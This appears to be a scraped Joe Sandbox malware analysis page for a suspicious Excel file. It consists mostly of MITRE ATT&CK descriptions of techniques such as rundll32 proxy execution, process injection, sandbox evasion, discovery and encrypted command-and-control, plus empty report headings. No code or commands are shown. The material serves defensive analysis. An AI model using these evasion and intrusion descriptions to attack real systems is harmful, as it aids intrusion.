Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_3_25b0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction ID: a2eb5689115dc6acc976ca2d1100eb54c5f55d6a9eee1fe6d75af123bb86cbc0
Opcode Fuzzy Hash: 1a9ce593b8061fe11d005a8fadf4466c64fb9f615bec526e67dbe7247faadaf0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Tactics:	Defense Evasion, Execution
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversary tools may directly use the Windows application programming interface (API) to execute binaries. Functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.
Tactics:	Execution
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as Remote Desktop Protocol , instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command , or other potentially difficult to monitor interactions.
Tactics:	Execution
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd , which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task ).
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may check for the presence of a virtual machine environment (VME) or sandbox to avoid potential detection of tools and activities. If the adversary detects a VME, they may alter their malware to conceal the core functions of the implant or disengage from the victim. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information from learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of local system or domain accounts.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	Azure AD, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	### Windows
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report MIL0001742828.xls

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Malware Configuration

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Private

Static File Info

General

File Icon

Static OLE Info

General

OLE File "MIL0001742828.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Foglio1.cls, Stream Size: 1419

General

VBA Code Keywords

VBA Code

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information from a target.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre